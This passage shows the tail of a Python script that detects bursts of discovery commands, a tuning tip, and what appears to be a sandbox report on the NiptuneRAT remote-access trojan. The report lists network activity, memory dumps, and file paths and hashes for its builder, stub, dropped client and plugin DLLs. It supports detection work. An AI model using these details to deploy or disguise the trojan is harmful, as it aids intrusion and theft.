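            tools = sorted({basename(e["image"]) for e in burst})
            if len(tools) >= threshold:
                parent = by_pid.get(ppid)
                grandparent = by_pid.get(parent["ppid"]) if parent else None
                alerts.append({
                    "parent_pid": ppid,
                    "parent_image": parent["image"] if parent else None,
                    "grandparent_image": grandparent["image"] if grandparent else None,
                    "first": first["ts"], "last": burst[-1]["ts"],
                    "event_count": len(burst), "distinct_tools": len(tools), "tools": tools,
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_LOG.splitlines()):
        print(alert)
```

The grandparent lookup is what turns a generic "cmd.exe ran recon" hit into a useful one: here it names the dropped $77NiptuneClient.exe as the origin of the shell. Tune the threshold against your own telemetry; admin scripts that run ipconfig and net once do not reach five distinct tools, but inventory agents can, and their images belong on an allowlist.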
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
| N/A | 127.0.0.1:1337 | N/A | tcp |
| N/A | 127.0.0.1:1337 | N/A | tcp |
| N/A | 127.0.0.1:1337 | N/A | tcp |
| N/A | 127.0.0.1:1337 | N/A | tcp |
Files
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | e05e2846c2c4eb4c218634e28031122a |
| SHA1 | daac3911d4aace4b6fcd5c6d5a2adb9950eacfd4 |
| SHA256 | 178bda21d7735ee8bc2bfb74bc487055853a451ae741b1486fda96125be8e7c4 |
| SHA512 | 181df2727abdaafb985a84588adac451b0d0031912a556a29b3e9071368022ff8119197a16171eaf43e5dfd42e9cb45c1801373a39907d8689fce40d1cc7ce39 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | c9b1ee4563ecf0789bab3fdc31c7c346 |
| SHA1 | 370173eb922e0d3d2f1d2393ef2dac604a6abcca |
| SHA256 | 783ce12d604d80f75e89cb9b8da650fbd65890ba3ed6c4b1dde3045d0b713052 |
| SHA512 | aa78e096bfb4a8cc5ce7b30ad7fd639f2f1106b0402da8ea0941f211d909a4a17cd41b272452d602583ba0083216c1e4ac485d869b9facdd71c78153e21dc208 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config
| MD5 | 465c8716dc52edeaf09f0c61fc988934 |
| SHA1 | 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b |
| SHA256 | 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5 |
| SHA512 | 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c |
memory/3012-163-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-164-0x0000022223CD0000-0x00000222255FA000-memory.dmp
memory/3012-165-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-166-0x000002223FB90000-0x000002223FDE2000-memory.dmp
memory/3012-167-0x0000022240200000-0x00000222403F4000-memory.dmp
memory/3012-168-0x0000022240780000-0x00000222408CE000-memory.dmp
memory/3012-169-0x0000022240910000-0x0000022240924000-memory.dmp
memory/3012-170-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-171-0x0000022249C10000-0x000002224A1F8000-memory.dmp
memory/3012-172-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-173-0x000002224A820000-0x000002224A82A000-memory.dmp
memory/3012-174-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-175-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-176-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-177-0x000002224ABB0000-0x000002224ABC2000-memory.dmp
memory/3012-178-0x000002224ABD0000-0x000002224AE50000-memory.dmp
memory/3012-188-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-189-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-190-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-191-0x000002224D260000-0x000002224D37E000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe
| MD5 | 0da861f192f8e722505826c141c05a40 |
| SHA1 | 4d717f9d2a64caf68374ed1e246cf38dd208227b |
| SHA256 | 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b |
| SHA512 | 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12
| MD5 | e22a0515af0220bc5c4497f85e518e24 |
| SHA1 | 2702b7cf46f8ae5ed920469b169c03b07a5d14e7 |
| SHA256 | 4512413f9478d03074b4bea5deaff1681ec28c74839c16f3cf7d56b0418a8f92 |
| SHA512 | cbee300346822a3cd9da43985143258085513bf4515287974f9def05c047477f313648f4017118167f30f1eb241b5c490a11128f98352f96b24f0d2e62840d92 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 77d636e08fe9de62cf19ad656409ccde |
| SHA1 | 827de958d0c46346c9c581be646b8c3a61fab648 |
| SHA256 | 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558 |
| SHA512 | 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\u04otmyy.newcfg
| MD5 | 67ae3b067855a1e16f01e16ee389c8f0 |
| SHA1 | 3bef83c7922cda26497a45bbfe209e65b14234a0 |
| SHA256 | 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a |
| SHA512 | db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699 |
C:\Users\Admin\Desktop\$77NiptuneClient.exe
| MD5 | 94ac7fdf09c22c9bfd33c451adfc1681 |
| SHA1 | 7bb6e40d7d2492d09b281fcd64ec94aa47d75e96 |
| SHA256 | f7446c1f2f1f0b7882ea06a028c77e17898cdd81b13ad6fd0b92c6d3377bbb9d |
| SHA512 | a532faabbe374c8ceb32d7fd8dc41b853c97e6a5831fbbb0dccfc46dbcc28ed9225959bc4bb2468379d53a0e8548ee592468e1c564f16e1a830205aafe1ca1c2 |
memory/3356-226-0x0000000000500000-0x0000000000516000-memory.dmp
memory/3356-227-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-228-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3356-229-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3012-230-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3356-231-0x00007FFB09280000-0x00007FFB09489000-memory.dmp
memory/3012-233-0x00000222274A0000-0x00000222274B0000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\RssCnLKcGRxj.dll
| MD5 | f6808c4fbbe0275db03b2cc5b4c2bc0d |
| SHA1 | e40b61c64c68f72fc5144f5057d54229babdecf8 |
| SHA256 | e204d15f0e7269d364157aaab265a5dfbe7e76c9f6202bf90998f0edd77ca248 |
| SHA512 | f077c49f6943d0e40799b3b42d1e11f50dabca48305c36ef2acd3258c990e0e0f982fbb0c27b1243aa15d2ed7b398b70f07dddc9ba76ff032ba74a24c8e08fb4 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll
| MD5 | e4ebcf76ff80ef398d3ab77d577f4c08 |
| SHA1 | cb9e6b30a63d50ae87610f6855b64abfb25691d2 |
| SHA256 | 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5 |
| SHA512 | 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll
| MD5 | 6b24cb03ca441f81764f14412abe22c4 |
| SHA1 | 37eefe413b01080c85f437e5845add5f9e3c2c10 |
| SHA256 | 057313c967420c8a6ef644a78109af3f681fb332f9e8ebb55e4a29efeb093afe |
| SHA512 | 9ef792c0b90f6eb1a6ed23402fd19bcf7ddb48ec0b7a18eaf7d708e873a060b4698e3174400162f2436a0180ebac72400883dd5cebe246a8690a053a431877a7 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll
| MD5 | cf863d12b476133d97f3827007f53fa1 |
| SHA1 | 97478287ae4ad542671fce20b39ccc47c230b5d8 |
| SHA256 | 9e80ce9cd2c8d4b15a1f7326a0b6674f3da617f4704cf5a49bb99b7dceed1b5e |
| SHA512 | 9ebfab2f4af63b69156aacbdd6e9f4ff581bb7c1cbf0d4d1f7faa35c838fcfbc77446ae3c735f8bb927c744ae81d9645b2c11c365ac49bb8732523520712ed5d |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\K8oCBS3ThnW0WP.dll
| MD5 | 081ea64eb8b4f333014276d59fdec0b4 |
| SHA1 | 0791627bb38d6818ceb2bf419f19376aef14e494 |
| SHA256 | b5022706fec021abf416d4b4f806485a2915f3a47b71e73241ef73e7845b21f9 |
| SHA512 | b5b9e2c1927313919de6ddc8cc5ddc3438846be8817e022f964ec52612f6ad5301a83c88888fffa1cdabc9a29f42431a4c84668987edb32b4bd6587d64dedd54 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll
| MD5 | 7884b35cfe1ba24ad7e4cd78f48a1a09 |
| SHA1 | 86cf35919ead978c5fe817d6c4f2e18bb32727fb |
| SHA256 | ed4562e5b6527f2ebb2318f83f31a3af4dbe06dbf8e764ebf5706b0790346b88 |
| SHA512 | 30a57bc171ec76c7295766df01f8970ff98dbb3a13a5c52a1e75329fb45b69b7fa8c199da0cb6648258b90c48c3341c3bde73088e773f5037f3de323192bcf8f |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll
| MD5 | 841ff739bd70a4c6f61a43793feea007 |
| SHA1 | ec73f4b50c2e36568bfb21b3f87cb8ca55ae5722 |
| SHA256 | cda6e05e54f1da8511958683aa100eb4bc6bb749ad4699676755dda18c152d84 |
| SHA512 | 086c1ac156b380ce850dcbbbd3ca59477953f665dc592944d851e89aa17f846c94a1003b57f5c842cf3e5536523828b407ee2a0b170f01605d7d72eb5c7db2f8 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll
| MD5 | ec4f4d4e9f133b53f5cab8a01193bdbc |
| SHA1 | 8a9539f232f1ee7437308af216c80efef434b3d7 |
| SHA256 | 63b132fb283869799d218b453ba8a032b5a2fea372a27871326536776fae9481 |
| SHA512 | 009967c45320248cbc5dab177f725c8b91e1f540e4651cfc59e25137f8c9933a84580f364057d1f6c11efd783b2bd782ecf7274ef6cf3a45252cf65ae339c6b3 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\KNTmoSnG.AnarHs.dll
| MD5 | 1681e0f3311751361030ff30a957a1ed |
| SHA1 | 8f3b55e130af507549817fda37474a1391e6b8f2 |
| SHA256 | 234724f14dbb999853aeb872d7e6c3ed0b3de5b105009b5c66131a2af8d0dbb4 |
| SHA512 | 60690b2c1e2816a640f5763f9c20de9a39cb9735ea4a3f0bf4f477d3e184f8791e556313a7523c70ed2fb9182d520842bce70057cedd5cb89b923fd6f9067dd1 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\maSN8TBMgUEC.dll
| MD5 | d5a278acdafa0c8b4380efb7d83e053e |
| SHA1 | 376218e3aa607a3b82be55cfa718826991953654 |
| SHA256 | d93d72c6e929bd9cea468458e6c0558908a92f0ecd11f4f4db0f49acfe9d4fc5 |
| SHA512 | 138def485e02fdcf1809f0d8162fdd2a50575f3cab56968fbc6d09d0c1e9fe6803860315e45c1a7e0eff75958988ed6b08735fa680fa66527630c6789a23a00b |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\oYsKwDG.dll
| MD5 | 19f8d8099cc9b7b6a68e7efebc44ac18 |
| SHA1 | 5a5cca2ad1168252d79ef7c0ffda58726de7f79c |
| SHA256 | 9157a6021901939611c80c4246dbec6007200b2f2457d348ce8834bef9872535 |
| SHA512 | 6bb58b3157feb010555382c5b5b5d0ee982af324f1d88512ea5d5b984b949995d7387a9496388cb7b9589007ae9ec651e5f8219085517d82eef093e4ebb7ecbc |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\mML6WKMqdxjDGA.dll
| MD5 | e03b206eec8a7efbd1a47909071226e5 |
| SHA1 | 21163989ea524920e874bc7932adfcd5e94f854e |
| SHA256 | 778877431354a9584325dadb663be077f757227eaae8bcad33e4bf26efd6b965 |
| SHA512 | 831ed74419f1b4c3250fbff20be16ed7058a851d7168a17e8a4dcf284a19412feee42a8c198af34b37571de33a80c48ac855f5d018ea9e2cfdcd846b832155ff |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\PK0TcnqTGFagQTS.dll
| MD5 | fa90a2aee0d172000257c4faca31237c |
| SHA1 | b317281b4acaaf1d7b7255c5e92887322abae892 |
| SHA256 | 991fc53fa1aa7b5cd0b6e19dab536873d68e4413fd55b533601a3a2582d38a49 |
| SHA512 | b05c0b52e011089258ad31dd23a1f8a0cc8145b202e42e2a9d4fdf892c12d4a7b5843cc7721041295ab796e8bc98747b9e321c4e54bfd1a7c9a02dd2796fc405 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Recovery.dll
| MD5 | 08131d6801c109f0764a4fe690aba8ef |
| SHA1 | e732af02326483700eda52ff40dc70cff6b7afcb |
| SHA256 | bc3a9390c043f8002e356ad34b2b11d3486682d0c275ab6729bb4a312e324f51 |
| SHA512 | 228ab0aa0ddfdb0c099f1db5112304d776cb97ab2dab376d38023e446cb2aec30d9585eba444818f3241ffbc28565a1aef11f97b5b42bf57037de8e4a8536e2a |
memory/3356-248-0x000000001D0C0000-0x000000001D136000-memory.dmp
memory/3356-249-0x00000000026C0000-0x00000000026F4000-memory.dmp
memory/3356-250-0x000000001B200000-0x000000001B21E000-memory.dmp
memory/3012-251-0x000002224C6E0000-0x000002224C7E0000-memory.dmp
memory/3356-252-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3356-253-0x000000001B240000-0x000000001B272000-memory.dmp
memory/3356-254-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3356-255-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3356-256-0x00007FFB09280000-0x00007FFB09489000-memory.dmp
memory/3356-258-0x000000001D240000-0x000000001D270000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3012-262-0x000002224C6E0000-0x000002224C7E0000-memory.dmp
memory/3356-263-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
C:\Users\Admin\Desktop\pp.anarh.txt
| MD5 | 9be9355dfef9f635bef4a94e4c040209 |
| SHA1 | b69a9fccf3391e898dbf8755ef71f7fc52e15880 |
| SHA256 | 9017a399259db69ba7e4a84f38843ca91df676a0b44ecec5ef884f83ed5fd44f |
| SHA512 | ad8dd6525d98214eb92c825bff6a197a7fe8bdda37f7b608725b4dc14780570104a0a2726ab971358b9b0ac40b8499b852b96d60a3aded254487d1c3f369b410 |